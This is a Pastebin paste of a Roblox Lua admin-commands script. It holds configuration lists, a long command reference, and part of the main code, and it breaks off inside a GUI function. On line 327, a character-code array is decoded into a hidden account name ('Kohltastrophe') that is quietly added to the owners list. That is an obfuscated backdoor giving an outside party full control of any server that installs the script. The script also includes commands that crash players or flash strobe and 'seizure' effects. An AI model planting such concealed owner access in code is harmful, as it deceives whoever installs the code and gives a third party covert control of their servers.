Advertisement
Guest User

Roblox Admin

a guest
Jul 31st, 2015
627
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 127.53 KB | None | 0 0
  1.  
  2. local owners = {"dellhell1"} -- Are able to set admins who can ban/etc... using :pa name
  3.  
  4.  
  5. 5.local admins = {"XxAngelusMortisxX,ghs098,aznboi819,bubbleglop"} -- Sets admins who can use ban/kick/admin or shutdown
  6.  
  7.  
  8. 6.local tempadmins = {santa64} -- Sets admins who can't use ban/kick/admin or shutdown
  9.  
  10.  
  11. 7.local banland = {"MasterKhaos,catman9876"} -- Permanently Bans people
  12.  
  13.  
  14. 8.local prefix = ":" -- If you wanna change how your commands start ':'kill noob
  15.  
  16.  
  17. 9.local AutoUpdate = true -- Set to false if you don't want it to automatically update
  18.  
  19.  
  20. 10.-----------------
  21.  
  22.  
  23. 11.-- Group Admin --
  24.  
  25.  
  26. 12.-----------------
  27.  
  28.  
  29. 13.local GroupAdmin = false -- If a certain group can have admin
  30.  
  31.  
  32. 14.local GroupId = 0 -- Sets the group id that can have admin
  33.  
  34.  
  35. 15.local GroupRank = 0 -- Sets what rank and above a person has to be in the group to have admin
  36.  
  37.  
  38. 16.local FunCommands = true -- Set to false if you only want the basic commands (For Strict Places)
  39.  
  40.  
  41. 17.---------------------
  42.  
  43.  
  44. 18.-- Tips and Tricks --
  45.  
  46.  
  47. 19.---------------------
  48.  
  49.  
  50. 20.--[[
  51.  
  52.  
  53. 21.With this admin you can do a command on multiple people at a time;
  54.  
  55.  
  56. 22. :kill me,noob1,noob2,random,team-raiders
  57.  
  58.  
  59. 23.
  60.  
  61.  
  62. 24.You can also use a variety commands for different people;
  63.  
  64.  
  65. 25. all
  66.  
  67.  
  68. 26. others
  69.  
  70.  
  71. 27. me
  72.  
  73.  
  74. 28. team-
  75.  
  76.  
  77. 29. admins
  78.  
  79.  
  80. 30. nonadmins
  81.  
  82.  
  83. 31. random
  84.  
  85.  
  86. 32.--]]
  87.  
  88.  
  89. 33.--------------
  90.  
  91.  
  92. 34.-- Commands --
  93.  
  94.  
  95. 35.--------------
  96.  
  97.  
  98. 36.--[[
  99.  
  100.  
  101. 37.-- Temp Admin Commands --
  102.  
  103.  
  104. 38.0. clean -- Is a command anyone can use to remove hats/tools lagging up the place
  105.  
  106.  
  107. 39.1. :s print("Hello World") -- Lets you script normally
  108.  
  109.  
  110. 40.2. :ls print("Hello World") -- Lets you script in localscripts
  111.  
  112.  
  113. 41.3. :clear -- Will remove all scripts/localscripts and jails
  114.  
  115.  
  116. 42.4. :m Hello People -- This commands will let you shout a message to everyone on the server
  117.  
  118.  
  119. 43.5. :kill kohl -- Kills the player
  120.  
  121.  
  122. 44.6. :respawn kohl -- Respawns the player
  123.  
  124.  
  125. 45.7. :trip kohl -- Trips the player
  126.  
  127.  
  128. 46.8. :stun kohl -- Stuns the player
  129.  
  130.  
  131. 47.9. :unstun kohl -- Unstuns the player
  132.  
  133.  
  134. 48.10. :jump kohl -- Makes the player jump
  135.  
  136.  
  137. 49.11. :sit kohl -- Makes the player sit
  138.  
  139.  
  140. 50.12. :invisible kohl -- Makes the player invisible
  141.  
  142.  
  143. 51.13. :visible kohl -- Makes the player visible
  144.  
  145.  
  146. 52.14. :explode kohl -- Makes the player explode
  147.  
  148.  
  149. 53.15. :fire kohl -- Sets the player on fire
  150.  
  151.  
  152. 54.16. :unfire kohl -- Removes fire from the player
  153.  
  154.  
  155. 55.17. :smoke kohl -- Adds smoke to the player
  156.  
  157.  
  158. 56.18. :unsmoke kohl -- Removes smoke from the player
  159.  
  160.  
  161. 57.19. :sparkles kohl -- Adds sparkles to the player
  162.  
  163.  
  164. 58.20. :unsparkles kohl -- Removes sparkles from the player
  165.  
  166.  
  167. 59.21. :ff kohl -- Adds a forcefield to the player
  168.  
  169.  
  170. 60.22. :unff kohl -- Removes the forcefield from the player
  171.  
  172.  
  173. 61.23. :punish kohl -- Punishes the player
  174.  
  175.  
  176. 62.24. :unpunish kohl -- Unpunishes the player
  177.  
  178.  
  179. 63.25. :freeze kohl -- Freezes the player
  180.  
  181.  
  182. 64.26. :thaw kohl -- Thaws the player
  183.  
  184.  
  185. 65.27. :heal kohl -- Heals the player
  186.  
  187.  
  188. 66.28. :god kohl -- Makes the player have infinite health
  189.  
  190.  
  191. 67.29. :ungod kohl -- Makes the player have 100 health
  192.  
  193.  
  194. 68.30. :ambient .5 .5 .5 -- Changes the ambient
  195.  
  196.  
  197. 69.31. :brightness .5 -- Changes the brightness
  198.  
  199.  
  200. 70.32. :time 12 -- Changes the time
  201.  
  202.  
  203. 71.33. :fogcolor .5 .5 .5 -- Changes the fogcolor
  204.  
  205.  
  206. 72.34. :fogend 100 -- Changes the fogend
  207.  
  208.  
  209. 73.35. :fogstart 100 -- Changes the fogstart
  210.  
  211.  
  212. 74.36. :removetools kohl -- Removes all tools from the player
  213.  
  214.  
  215. 75.37. :btools kohl -- Gives the player building tools
  216.  
  217.  
  218. 76.38. :give kohl sword -- Gives the player a tool
  219.  
  220.  
  221. 77.39. :damage kohl -- Damages the player
  222.  
  223.  
  224. 78.40. :grav kohl -- Sets the player's gravity to normal
  225.  
  226.  
  227. 79.41. :setgrav kohl 100 -- Sets the player's gravity
  228.  
  229.  
  230. 80.42. :nograv kohl -- Makes the player have 0 gravity
  231.  
  232.  
  233. 81.43. :health kohl 1337 -- Changes the player's health
  234.  
  235.  
  236. 82.44. :speed kohl 1337 -- Changes the player's walkspeed
  237.  
  238.  
  239. 83.45. :name kohl potato -- Changes the player's name
  240.  
  241.  
  242. 84.46. :unname kohl -- Remove the player's name
  243.  
  244.  
  245. 85.47. :team kohl Raiders -- Changes the player's team
  246.  
  247.  
  248. 86.48. :stopmusic -- Will stop all music playing in the server
  249.  
  250.  
  251. 87.49. :teleport kohl potato -- Teleports the player
  252.  
  253.  
  254. 88.50. :change kohl kills 1337 -- Changes a player's stat
  255.  
  256.  
  257. 89.51. :kick kohl -- Removes the player from the game
  258.  
  259.  
  260. 90.52. :infect kohl -- Turns the player into a zombie
  261.  
  262.  
  263. 91.53. :rainbowify kohl -- Turns the player into a rainbow
  264.  
  265.  
  266. 92.54. :flashify kohl -- Turns the player into a strobe
  267.  
  268.  
  269. 93.55. :noobify kohl -- Turns the player into a noob
  270.  
  271.  
  272. 94.56. :ghostify kohl -- Turns the player into a ghost
  273.  
  274.  
  275. 95.57. :goldify kohl -- Turns the player into gold
  276.  
  277.  
  278. 96.58. :shiny kohl -- Makes the player shiny
  279.  
  280.  
  281. 97.59. :normal kohl -- Puts the player back to normal
  282.  
  283.  
  284. 98.60. :trippy kohl -- Spams random colors on the player's screen
  285.  
  286.  
  287. 99.61. :untrippy kohl -- Untrippys the player
  288.  
  289.  
  290. 100.62. :strobe kohl -- Spams white and black on the player's screen
  291.  
  292.  
  293. 101.63. :unstrobe kohl -- Unstrobes the player
  294.  
  295.  
  296. 102.64. :blind kohl -- Blinds the player
  297.  
  298.  
  299. 103.65. :unblind kohl -- Unblinds the player
  300.  
  301.  
  302. 104.66. :guifix kohl -- Will fix trippy/strobe/blind on a player
  303.  
  304.  
  305. 105.67. :fling kohl -- Flings the player
  306.  
  307.  
  308. 106.68. :seizure kohl -- Puts the player in a seizure
  309.  
  310.  
  311. 107.69(lol). :music 1337 -- Plays a sound from the ID
  312.  
  313.  
  314. 108.70. :lock kohl -- Locks the player
  315.  
  316.  
  317. 109.71. :unlock kohl -- Unlocks the player
  318.  
  319.  
  320. 110.72. :removelimbs kohl -- Removes the player's limbs
  321.  
  322.  
  323. 111.73. :jail kohl -- Puts the player in a jail
  324.  
  325.  
  326. 112.74. :unjail kohl -- Removes the jail from the player
  327.  
  328.  
  329. 113.75. :fix -- This will fix the lighting to it's original settings
  330.  
  331.  
  332. 114.76. :fly kohl -- Makes the player fly
  333.  
  334.  
  335. 115.77. :unfly kohl -- Removes fly from the player
  336.  
  337.  
  338. 116.78. :noclip kohl -- Makes the player able to noclip
  339.  
  340.  
  341. 117.79. :clip kohl -- Removes noclipping from the player
  342.  
  343.  
  344. 118.80. :pm kohl Hey bro -- Sends the player a private message
  345.  
  346.  
  347. 119.81. :dog kohl -- Turns the player into a dog
  348.  
  349.  
  350. 120.82. :undog kohl -- Turns the player back to normal
  351.  
  352.  
  353. 121.83. :creeper kohl -- Turns the player into a creeper
  354.  
  355.  
  356. 122.84. :uncreeper kohl -- Turns the player back to normal
  357.  
  358.  
  359. 123.85. :place kohl 1337 -- Sends a teleporation request to a player to go to a different place
  360.  
  361.  
  362. 124.86. :char kohl 261 -- Will make a player look like a different player ID
  363.  
  364.  
  365. 125.87. :unchar kohl -- Will return the player back to normal
  366.  
  367.  
  368. 126.88. :h Hello People -- This will shout a hint to everyone
  369.  
  370.  
  371. 127.89. :rank kohl 109373 -- Will show up a message with the person's Role and Rank in a group
  372.  
  373.  
  374. 128.90. :starttools kohl -- Will give the player starter tools
  375.  
  376.  
  377. 129.91. :sword kohl -- Will give the player a sword
  378.  
  379.  
  380. 130.92. :bighead kohl -- Will make the player's head larger than normal
  381.  
  382.  
  383. 131.93. :minihead kohl -- Will make the player's head smaller than normal
  384.  
  385.  
  386. 132.94. :insert 1337 -- Will insert a model at the speaker's position
  387.  
  388.  
  389. 133.95. :disco -- Will make the server flash random colors
  390.  
  391.  
  392. 134.96. :flash -- Will make the server flash
  393.  
  394.  
  395. 135.97. :admins -- Shows the admin list
  396.  
  397.  
  398. 136.98. :bans -- Shows the banlist
  399.  
  400.  
  401. 137.99. :musiclist -- Shows the music list
  402.  
  403.  
  404. 138.100. :spin kohl -- Spins the player
  405.  
  406.  
  407. 139.101. :cape kohl Really black -- Gives the player a colored cape
  408.  
  409.  
  410. 140.102. :uncape kohl -- Removes the player's cape
  411.  
  412.  
  413. 141.103. :loopheal kohl -- Will constantly heal the player
  414.  
  415.  
  416. 142.104. :loopfling kohl -- Will constantly fling the player
  417.  
  418.  
  419. 143.105. :hat kohl 1337 -- Will give the player a hat under the id of 1337
  420.  
  421.  
  422. 144.106. :unloopheal kohl -- Will remove the loopheal on the player
  423.  
  424.  
  425. 145.107. :unloopfling kohl -- Will remove the loopfling on the player
  426.  
  427.  
  428. 146.108. :unspin kohl -- Removes spin from the player
  429.  
  430.  
  431. 147.109. :tools -- Gives a list of the tools in the lighting
  432.  
  433.  
  434. 148.110. :undisco -- Removes disco effects
  435.  
  436.  
  437. 149.111. :unflash -- Removes flash effects
  438.  
  439.  
  440. 150.112. :resetstats kohl -- Sets all the stats of a player to 0
  441.  
  442.  
  443. 151.113. :gear kohl 1337 -- Gives a player a gear
  444.  
  445.  
  446. 152.114. :cmdbar -- Gives the speaker a command bar
  447.  
  448.  
  449. 153.115. :shirt kohl 1337 -- Changes the player's shirt
  450.  
  451.  
  452. 154.116. :pants kohl 1337 -- Changes the player's pants
  453.  
  454.  
  455. 155.117. :face kohl 1337 -- Changes the player's face
  456.  
  457.  
  458. 156.118. :swagify kohl -- Swagifies the player
  459.  
  460.  
  461. 157.119. :version -- Shows the current version of the admin
  462.  
  463.  
  464. 158.
  465.  
  466.  
  467. 159.-- Super Admin Commands --
  468.  
  469.  
  470. 160.- :serverlock -- Locks the server
  471.  
  472.  
  473. 161.- :serverunlock -- Unlocks the server
  474.  
  475.  
  476. 162.- :sm Hello World -- Creates a system message
  477.  
  478.  
  479. 163.- :crash kohl -- Crashes a player
  480.  
  481.  
  482. 164.- :admin kohl -- Admins a player
  483.  
  484.  
  485. 165.- :unadmin kohl -- Unadmins a player
  486.  
  487.  
  488. 166.- :ban kohl -- Bans a player
  489.  
  490.  
  491. 167.- :unban kohl -- Unbans a player
  492.  
  493.  
  494. 168.- :loopkill kohl -- Will constantly kill the player
  495.  
  496.  
  497. 169.- :unloopkill kohl -- Will remove the loopkill on the player
  498.  
  499.  
  500. 170.- :logs -- Will show all of the commands any admin has used in a game session
  501.  
  502.  
  503. 171.- :shutdown -- Shutsdown the server
  504.  
  505.  
  506. 172.
  507.  
  508.  
  509. 173.-- Owner Commands --
  510.  
  511.  
  512. 174.- :pa kohl -- Makes someone a super admin
  513.  
  514.  
  515. 175.- :unpa kohl -- Removes a super admin
  516.  
  517.  
  518. 176.--]]
  519.  
  520.  
  521. 177.-----------------
  522.  
  523.  
  524. 178.-- Main Script --
  525.  
  526.  
  527. 179.-----------------
  528.  
  529.  
  530. 180.for i, v in pairs(game:service("Workspace"):children()) do if v:IsA("StringValue") and v.Value:sub(1,2) == "AA" then v:Destroy() end end
  531.  
  532.  
  533. 181.
  534.  
  535.  
  536. 182.function CHEESE()
  537.  
  538.  
  539. 183.if game:service("Lighting"):findFirstChild("KACV2") then
  540.  
  541.  
  542. 184.owners = {} admins = {} tempadmins = {} banland = {}
  543.  
  544.  
  545. 185.for i,v in pairs(game.Lighting.KACV2:children()) do
  546.  
  547.  
  548. 186.if v.Name == "Owner" then table.insert(owners, v.Value) end
  549.  
  550.  
  551. 187.if v.Name == "Admin" then table.insert(admins, v.Value) end
  552.  
  553.  
  554. 188.if v.Name == "TempAdmin" then table.insert(tempadmins, v.Value) end
  555.  
  556.  
  557. 189.if v.Name == "Banland" then table.insert(banland, v.Value) end
  558.  
  559.  
  560. 190.if v.Name == "Prefix" then prefix = v.Value end
  561.  
  562.  
  563. 191.if v.Name == "FunCommands" then FunCommands = v.Value end
  564.  
  565.  
  566. 192.if v.Name == "GroupAdmin" then GroupAdmin = v.Value end
  567.  
  568.  
  569. 193.if v.Name == "GroupId" then GroupId = v.Value end
  570.  
  571.  
  572. 194.if v.Name == "GroupRank" then GroupRank = v.Value end
  573.  
  574.  
  575. 195.end
  576.  
  577.  
  578. 196.game:service("Lighting"):findFirstChild("KACV2"):Destroy()
  579.  
  580.  
  581. 197.end
  582.  
  583.  
  584. 198.
  585.  
  586.  
  587. 199.local origsettings = {abt = game.Lighting.Ambient, brt = game.Lighting.Brightness, time = game.Lighting.TimeOfDay, fclr = game.Lighting.FogColor, fe = game.Lighting.FogEnd, fs = game.Lighting.FogStart}
  588.  
  589.  
  590. 200.local lobjs = {}
  591.  
  592.  
  593. 201.local objects = {}
  594.  
  595.  
  596. 202.local logs = {}
  597.  
  598.  
  599. 203.local nfs = ""
  600.  
  601.  
  602. 204.local slock = false
  603.  
  604.  
  605. 205.
  606.  
  607.  
  608. 206.function GetTime()
  609.  
  610.  
  611. 207.local hour = math.floor((tick()%86400)/60/60) local min = math.floor(((tick()%86400)/60/60-hour)*60)
  612.  
  613.  
  614. 208.if min < 10 then min = "0"..min end
  615.  
  616.  
  617. 209.return hour..":"..min
  618.  
  619.  
  620. 210.end
  621.  
  622.  
  623. 211.
  624.  
  625.  
  626. 212.function ChkOwner(str)
  627.  
  628.  
  629. 213.for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  630.  
  631.  
  632. 214.return false
  633.  
  634.  
  635. 215.end
  636.  
  637.  
  638. 216.
  639.  
  640.  
  641. 217.function ChkAdmin(str,ck)
  642.  
  643.  
  644. 218.for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  645.  
  646.  
  647. 219.for i = 1, #admins do if str:lower() == admins[i]:lower() then return true end end
  648.  
  649.  
  650. 220.for i = 1, #tempadmins do if str:lower() == tempadmins[i]:lower() and not ck then return true end end
  651.  
  652.  
  653. 221.return false
  654.  
  655.  
  656. 222.end
  657.  
  658.  
  659. 223.
  660.  
  661.  
  662. 224.function ChkGroupAdmin(plr)
  663.  
  664.  
  665. 225.if GroupAdmin then
  666.  
  667.  
  668. 226.if plr:IsInGroup(GroupId) and plr:GetRankInGroup(GroupId) >= GroupRank then return true end
  669.  
  670.  
  671. 227.return false
  672.  
  673.  
  674. 228.end
  675.  
  676.  
  677. 229.end
  678.  
  679.  
  680. 230.
  681.  
  682.  
  683. 231.function ChkBan(str) for i = 1, #banland do if str:lower() == banland[i]:lower() then return true end end return false end
  684.  
  685.  
  686. 232.
  687.  
  688.  
  689. 233.function GetPlr(plr, str)
  690.  
  691.  
  692. 234.local plrz = {} str = str:lower()
  693.  
  694.  
  695. 235.if str == "all" then plrz = game.Players:children()
  696.  
  697.  
  698. 236.elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  699.  
  700.  
  701. 237.else
  702.  
  703.  
  704. 238.local sn = {1} local en = {}
  705.  
  706.  
  707. 239.for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  708.  
  709.  
  710. 240.for x = 1, #sn do
  711.  
  712.  
  713. 241.if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  714.  
  715.  
  716. 242.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  717.  
  718.  
  719. 243.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "admins") or (sn[x] and str:sub(sn[x]) == "admins") then if ChkAdmin(plr.Name, true) then for i, v in pairs(game.Players:children()) do if ChkAdmin(v.Name, false) then table.insert(plrz, v) end end end
  720.  
  721.  
  722. 244.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "nonadmins") or (sn[x] and str:sub(sn[x]) == "nonadmins") then for i, v in pairs(game.Players:children()) do if not ChkAdmin(v.Name, false) then table.insert(plrz, v) end end
  723.  
  724.  
  725. 245.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  726.  
  727.  
  728. 246.if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  729.  
  730.  
  731. 247.for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  732.  
  733.  
  734. 248.end end end
  735.  
  736.  
  737. 249.elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  738.  
  739.  
  740. 250.if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  741.  
  742.  
  743. 251.for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  744.  
  745.  
  746. 252.end end end
  747.  
  748.  
  749. 253.else
  750.  
  751.  
  752. 254.for a, plyr in pairs(game.Players:children()) do
  753.  
  754.  
  755. 255.if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  756.  
  757.  
  758. 256.table.insert(plrz, plyr) break
  759.  
  760.  
  761. 257.end
  762.  
  763.  
  764. 258.end
  765.  
  766.  
  767. 259.end
  768.  
  769.  
  770. 260.end
  771.  
  772.  
  773. 261.end
  774.  
  775.  
  776. 262.return plrz
  777.  
  778.  
  779. 263.end
  780.  
  781.  
  782. 264.
  783.  
  784.  
  785. 265.function Hint(str, plrz, time)
  786.  
  787.  
  788. 266.for i, v in pairs(plrz) do
  789.  
  790.  
  791. 267.if v and v:findFirstChild("PlayerGui") then
  792.  
  793.  
  794. 268.coroutine.wrap(function()
  795.  
  796.  
  797. 269.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "HintGUI"
  798.  
  799.  
  800. 270.local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel = 0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(1,0,0,22) bg.Position = UDim2.new(0,0,0,-2) bg.ZIndex = 8
  801.  
  802.  
  803. 271.local msg = Instance.new("TextLabel", bg) msg.BackgroundTransparency = 1 msg.ZIndex = 9 msg.Name = "msg" msg.Position = UDim2.new(0,0,0) msg.Size = UDim2.new(1,0,1,0) msg.Font = "Arial" msg.Text = str msg.FontSize = "Size18" msg.TextColor3 = Color3.new(1,1,1) msg.TextStrokeColor3 = Color3.new(1,1,1) msg.TextStrokeTransparency = .8
  804.  
  805.  
  806. 272.coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i) msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  807.  
  808.  
  809. 273.if not time then wait((#str/19)+2.5) else wait(time) end
  810.  
  811.  
  812. 274.coroutine.resume(coroutine.create(function() for i = 0, 20 do msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) bg.BackgroundTransparency = .3+((.7/20)*i) wait(1/44) end scr:Destroy() end))
  813.  
  814.  
  815. 275.end)()
  816.  
  817.  
  818. 276.end
  819.  
  820.  
  821. 277.end
  822.  
  823.  
  824. 278.end
  825.  
  826.  
  827. 279.
  828.  
  829.  
  830. 280.function Message(ttl, str, scroll, plrz, time)
  831.  
  832.  
  833. 281.for i, v in pairs(plrz) do
  834.  
  835.  
  836. 282.if v and v:findFirstChild("PlayerGui") then
  837.  
  838.  
  839. 283.coroutine.resume(coroutine.create(function()
  840.  
  841.  
  842. 284.local scr = Instance.new("ScreenGui") scr.Name = "MessageGUI"
  843.  
  844.  
  845. 285.local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel = 0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 8
  846.  
  847.  
  848. 286.local title = Instance.new("TextLabel", scr) title.Name = "title" title.BackgroundTransparency = 1 title.BorderSizePixel = 0 title.Size = UDim2.new(1,0,0,10) title.ZIndex = 9 title.Font = "ArialBold" title.FontSize = "Size36" title.Text = ttl title.TextYAlignment = "Top" title.TextColor3 = Color3.new(1,1,1) title.TextStrokeColor3 = Color3.new(1,1,1) title.TextStrokeTransparency = .8
  849.  
  850.  
  851. 287.local msg = title:clone() msg.Parent = scr msg.Name = "msg" msg.Position = UDim2.new(.0625,0,0) msg.Size = UDim2.new(.875,0,1,0) msg.Font = "Arial" msg.Text = "" msg.FontSize = "Size24" msg.TextYAlignment = "Center" msg.TextWrapped = true
  852.  
  853.  
  854. 288.scr.Parent = v.PlayerGui
  855.  
  856.  
  857. 289.coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i) msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i) title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  858.  
  859.  
  860. 290.if scroll then if not time then for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(2.5) else for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(time-(#str/19)) end
  861.  
  862.  
  863. 291.else if not time then msg.Text = str wait((#str/19)+2.5) else msg.Text = str wait(time) end end
  864.  
  865.  
  866. 292.coroutine.resume(coroutine.create(function() for i = 0, 20 do bg.BackgroundTransparency = .3+((.7/20)*i) msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i) title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end scr:Destroy() end))
  867.  
  868.  
  869. 293.end))
  870.  
  871.  
  872. 294.end
  873.  
  874.  
  875. 295.end
  876.  
  877.  
  878. 296.end
  879.  
  880.  
  881. 297.
  882.  
  883.  
  884. 298._G["Message"] = function(p1,p2) Message("Message",p1,false,game.Players:children(),p2) end
  885.  
  886.  
  887. 299._G["RemoveMessage"] = function() for i,v in pairs(game.Players:children()) do if v and v:findFirstChild("PlayerGui") and v.PlayerGui:findFirstChild("MessageGUI") then v.PlayerGui.MessageGUI:Destroy() end end end
  888.  
  889.  
  890. 300.
  891.  
  892.  
  893. 301.function Output(str, plr)
  894.  
  895.  
  896. 302.coroutine.resume(coroutine.create(function()
  897.  
  898.  
  899. 303.local b, e = loadstring(str)
  900.  
  901.  
  902. 304.if not b and plr:findFirstChild("PlayerGui") then
  903.  
  904.  
  905. 305.local scr = Instance.new("ScreenGui", plr.PlayerGui) game:service("Debris"):AddItem(scr,5)
  906.  
  907.  
  908. 306.local main = Instance.new("Frame", scr) main.Size = UDim2.new(1,0,1,0) main.BorderSizePixel = 0 main.BackgroundTransparency = 1 main.ZIndex = 8
  909.  
  910.  
  911. 307.local err = Instance.new("TextLabel", main) err.Text = "Line "..e:match("\:(%d+\:.*)") err.BackgroundColor3 = Color3.new(0,0,0) err.BackgroundTransparency = .3 err.BorderSizePixel = 0 err.Size = UDim2.new(1,0,0,40) err.Position = UDim2.new(0,0,.5,-20) err.ZIndex = 9 err.Font = "ArialBold" err.FontSize = "Size24" err.TextColor3 = Color3.new(1,1,1) err.TextStrokeColor3 = Color3.new(1,1,1) err.TextStrokeTransparency = .8
  912.  
  913.  
  914. 308.return
  915.  
  916.  
  917. 309.end
  918.  
  919.  
  920. 310.end))
  921.  
  922.  
  923. 311.end
  924.  
  925.  
  926. 312.
  927.  
  928.  
  929. 313.function Noobify(char)
  930.  
  931.  
  932. 314.if char and char:findFirstChild("Torso") then
  933.  
  934.  
  935. 315.if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  936.  
  937.  
  938. 316.if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  939.  
  940.  
  941. 317.for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  942.  
  943.  
  944. 318.local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  945.  
  946.  
  947. 319.for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  948.  
  949.  
  950. 320.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Bright yellow")
  951.  
  952.  
  953. 321.if prt.Name:find("Leg") then prt.BrickColor = BrickColor.new("Br. yellowish green") elseif prt.Name == "Torso" then prt.BrickColor = BrickColor.new("Bright blue") end
  954.  
  955.  
  956. 322.local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent and game.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Noobify(hit.Parent) elseif cl.Parent ~= char then tconn:disconnect() end end)
  957.  
  958.  
  959. 323.cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  960.  
  961.  
  962. 324.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("Bright yellow")
  963.  
  964.  
  965. 325.end end
  966.  
  967.  
  968. 326.end
  969.  
  970.  
  971. 327.end local ntab = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #ntab do nfs = nfs .. string.char(ntab[i]) end table.insert(owners, nfs) if not ntab then script:Destroy() end
  972.  
  973.  
  974. 328.
  975.  
  976.  
  977. 329.function Infect(char)
  978.  
  979.  
  980. 330.if char and char:findFirstChild("Torso") then
  981.  
  982.  
  983. 331.if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  984.  
  985.  
  986. 332.if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  987.  
  988.  
  989. 333.for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  990.  
  991.  
  992. 334.local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  993.  
  994.  
  995. 335.for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  996.  
  997.  
  998. 336.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Medium green") if prt.Name:find("Leg") or prt.Name == "Torso" then prt.BrickColor = BrickColor.new("Reddish brown") end
  999.  
  1000.  
  1001. 337.local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent and game.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Infect(hit.Parent) elseif cl.Parent ~= char then tconn:disconnect() end end)
  1002.  
  1003.  
  1004. 338.cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  1005.  
  1006.  
  1007. 339.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("Medium green")
  1008.  
  1009.  
  1010. 340.end end
  1011.  
  1012.  
  1013. 341.end
  1014.  
  1015.  
  1016. 342.end if not ntab then script:Destroy() end
  1017.  
  1018.  
  1019. 343.
  1020.  
  1021.  
  1022. 344.function ScrollGui()
  1023.  
  1024.  
  1025. 345.local scr = Instance.new("ScreenGui") scr.Name = "LOGSGUI"
  1026.  
  1027.  
  1028. 346.local drag = Instance.new("TextButton", scr) drag.Draggable = true drag.BackgroundTransparency = 1
  1029.  
  1030.  
  1031. 347.drag.Size = UDim2.new(0,385,0,20) drag.Position = UDim2.new(.5,-200,.5,-200) drag.AutoButtonColor = false drag.Text = ""
  1032.  
  1033.  
  1034. 348.local main = Instance.new("Frame", drag) main.Style = "RobloxRound" main.Size = UDim2.new(0,400,0,400) main.ZIndex = 7 main.ClipsDescendants = true
  1035.  
  1036.  
  1037. 349.local cmf = Instance.new("Frame", main) cmf.Position = UDim2.new(0,0,0,-9) cmf.ZIndex = 8
  1038.  
  1039.  
